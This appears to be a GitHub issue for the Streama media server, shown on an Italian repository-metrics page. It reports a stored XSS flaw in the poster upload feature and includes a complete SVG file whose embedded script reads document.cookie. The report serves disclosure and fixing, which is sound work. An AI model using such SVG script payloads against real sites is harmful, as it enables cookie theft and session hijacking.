streamaserver/streama

XSS in the Upload Poster feature using an SVG image

Open

#1088 aperta il 13 set 2021

Vedi su GitHub
 (0 commenti) (1 reazione) (0 assegnatari)JavaScript (977 fork)batch import
BugHelp wanted

Metriche repository

Star
 (9565 star)
Metriche merge PR
 (Nessuna PR mergiata in 30 g)

Descrizione

If uploading a SVG file in the poster file browser containing a script tag, this script tag will be executed when opening the file. example file:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg" id="mysvg">
<script>
alert(document.cookie);
</script>
</svg>

Guida contributor